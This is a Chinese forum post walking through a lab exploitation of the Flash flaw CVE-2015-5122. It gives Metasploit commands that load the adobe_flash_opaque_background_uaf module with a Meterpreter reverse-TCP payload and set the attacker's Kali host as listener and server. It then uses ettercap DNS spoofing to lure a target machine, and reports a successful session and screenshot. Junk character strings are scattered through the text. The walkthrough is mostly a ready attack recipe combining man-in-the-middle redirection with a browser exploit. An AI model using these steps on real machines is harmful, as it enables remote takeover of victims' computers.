cve2015-5122漏洞实例演示虚拟机

admin · 发表于 2018-10-20 20:28:02

) A, U4 P" D/ [9 r) ~( R! F7 @0 }4 V 二、cve2015-5122漏洞实例演示虚拟机 % T" T! h: @' N: D

$ g1 C0 ~; x2 Z. F) E 关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： $ t+ j+ e2 A/ V, R4 Q& _; H

# Z' @! r7 e- k: o6 v) A. i search cve-2015-5122如图： 7 R$ @# r3 _* M$ d

9 b0 J$ l! d0 K; j1 m! B * m8 e& r8 f; l* z

# k7 D- p2 \& ?( S% N: T2 s 下面我们敲如下命令： 9 |/ h3 o( m' F" J( U j# Q

& Y/ T* ]* |$ M1 Z2 F- f7 V use exploit/multi/browser/adobe_flash_opaque_background_uaf " R1 g1 I$ V; `/ i

: Z) ^2 b( X* a; K( j5 [- I. @ set PAYLOAD windows/meterpreter/reverse_tcp / o0 Z3 P, t4 x" b

D# A. T+ }+ T9 o- } set LHOST 192.168.0.109 ( \2 G) E( O+ ~4 z4 ?! Z

3 c/ B/ B E, |2 Y) h set URIPATH / /*根目录*/ : C4 g+ F6 q" R

0 K* T) u" S5 x& [8 k6 H- K4 ~ set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 * y3 @% W* D5 n

- ?8 U) l a$ ] set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 1 {8 Q# j7 U q3 e

2 A. R# f/ j" v# L8 [, `' D6 } 然后show options如图： 3 V- x. `1 a2 x$ P

0 R9 s1 w' T$ i$ z. c& e; c$ s0 t 3 @: x) v k1 ]/ N. y

9 p& B. V" ^) o7 O; r; b1 j J2 T: e# [ 一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
/ g3 ~. o' P) M8 S1 V2 ]/ m( f6 { / Q; i* u& w: L2 p1 j

7 o* c( d7 |% F. D f n 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 , Z5 u) e8 O9 Z7 i) K

/ ^) m3 `* C/ y Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf 2 t$ j9 M+ @) Y: H

8 m5 u& ?2 C$ w- l5 c ! U1 l% B" p/ W' \; R

/ j4 G w4 s) |/ n 成功了，这时候我们断开ettercap，如图： * _ M; z* b8 W+ K6 {9 C0 \9 G

4 h; Q1 {3 |7 F* ?) v* P# z 9 k) h; g( a# I9 r6 J y

+ o4 G8 p6 c2 Q9 K Screenshot如图： , n1 ^" K: T9 L# [- o4 v8 U* C

( o1 j8 b% U5 z* C0 p, d, y: B ' @+ ?4 u7 N* e. M

) e9 X- I8 C% \& u' ?& u, U( k . @, d; D. T8 j" R) k6 `" g

		自动登录	找回密码
密码			立即注册

cve2015-5122漏洞实例演示虚拟机

浏览过的版块